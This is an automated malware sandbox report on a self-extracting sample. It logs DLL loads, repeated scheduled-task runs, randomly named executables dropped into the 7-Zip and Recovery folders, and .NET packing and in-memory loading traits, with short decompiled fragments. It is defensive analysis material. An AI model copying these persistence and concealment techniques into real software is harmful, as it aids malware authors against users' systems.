Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: version.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: mscoree.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: apphelp.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: version.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: wldp.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: profapi.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: sspicli.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: amsi.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: userenv.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: rasman.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: rtutils.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: mswsock.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: winhttp.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: winnsi.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: winmm.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: winmmbase.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: mmdevapi.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: devobj.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: ksuser.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: avrt.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: audioses.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: powrprof.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: umpdc.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: msacm32.dll
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Section loaded: midimap.dll

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\bridgeportserver\blockServerruntime.exe	Directory created: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe			Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Directory created: C:\Program Files\7-Zip\Lang\c4950d50751633			Jump to behavior

Source: N0tepkRPzw.exe

Static file information: File size 1806983 > 1048576

Source: N0tepkRPzw.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: N0tepkRPzw.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: N0tepkRPzw.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: N0tepkRPzw.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: N0tepkRPzw.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: N0tepkRPzw.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: N0tepkRPzw.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: N0tepkRPzw.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: N0tepkRPzw.exe

Source: N0tepkRPzw.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: N0tepkRPzw.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: N0tepkRPzw.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: N0tepkRPzw.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: N0tepkRPzw.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, BPlkEZbgpdgWkPvxeOi.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, BPlkEZbgpdgWkPvxeOi.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, VnjqRUpONPwOHnBxdFS.cs	.Net Code: h91IjUkwSs System.AppDomain.Load(byte[])
Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, VnjqRUpONPwOHnBxdFS.cs	.Net Code: h91IjUkwSs System.Reflection.Assembly.Load(byte[])
Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, VnjqRUpONPwOHnBxdFS.cs	.Net Code: h91IjUkwSs
Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, VnjqRUpONPwOHnBxdFS.cs	.Net Code: h91IjUkwSs System.AppDomain.Load(byte[])
Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, VnjqRUpONPwOHnBxdFS.cs	.Net Code: h91IjUkwSs System.Reflection.Assembly.Load(byte[])
Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, VnjqRUpONPwOHnBxdFS.cs	.Net Code: h91IjUkwSs

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

File created: C:\bridgeportserver\__tmp_rar_sfx_access_check_4367921

Jump to behavior

Source: N0tepkRPzw.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D6E28C push eax; ret	0_2_00D6E2AA
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D6ED46 push ecx; ret	0_2_00D6ED59
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAA90E6 push esp; ret	4_2_00007FFD9BAA90E7
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Code function: 28_2_00007FFD9BACE55C push es; retn 7002h	28_2_00007FFD9BACE639
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Code function: 28_2_00007FFD9BAC33B1 pushfd ; iretd	28_2_00007FFD9BAC33B2
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Code function: 28_2_00007FFD9BAC362D push E95E508Fh; ret	28_2_00007FFD9BAC3649
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Code function: 28_2_00007FFD9BAD28F8 push eax; retf	28_2_00007FFD9BAD28F9

Source: blockServerruntime.exe.0.dr	Static PE information: section name: .text entropy: 6.987474284573492
